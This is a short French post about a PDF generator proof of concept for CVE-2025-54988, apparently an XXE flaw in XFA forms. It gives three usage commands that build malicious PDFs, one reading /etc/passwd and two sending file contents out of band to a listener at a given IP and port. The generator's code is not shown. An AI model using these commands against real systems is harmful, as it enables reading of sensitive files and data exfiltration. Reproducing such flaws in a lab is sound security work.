
Un générateur de PDF pour CVE-2025-54988
Avertissement : Je ne suis pas le découvreur original de cette vulnérabilité. Ce post documente mon processus de reproduction du problème dans un environnement contrôlé à des fins éducatives et pour aider d'autres à valider leurs propres systèmes. Les tests ont été menés dans un laboratoire isolé sans impact sur les systèmes de production.
Utilisation :
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
